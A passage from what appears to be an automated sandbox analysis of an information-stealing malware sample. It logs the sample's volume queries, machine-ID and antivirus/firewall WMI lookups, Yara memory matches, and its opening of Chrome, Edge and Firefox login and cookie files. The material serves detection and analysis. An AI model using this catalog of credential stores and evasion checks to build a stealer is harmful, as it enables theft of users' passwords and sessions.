                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Recovery\RuntimeBroker.exe Queries volume information: C:\Recovery\RuntimeBroker.exe VolumeInformation
                      Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Recovery\RuntimeBroker.exe VolumeInformation
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe VolumeInformation
                      Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Recovery\RuntimeBroker.exe VolumeInformation
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe VolumeInformation
                      Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Recovery\RuntimeBroker.exe VolumeInformation
                      Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Recovery\RuntimeBroker.exe VolumeInformation
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information

                      Source: Yara matchFile source: Process Memory Space: 84JufgBTrA.exe PID: 5300, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 7112, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.84JufgBTrA.exe.1bb20000.19.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.84JufgBTrA.exe.1bb20000.19.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.84JufgBTrA.exe.133d4ac0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1886789398.000000001BB20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1841806382.0000000013369000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.2.84JufgBTrA.exe.1bb20000.19.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.84JufgBTrA.exe.1bb20000.19.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.84JufgBTrA.exe.133d4ac0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1886789398.000000001BB20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
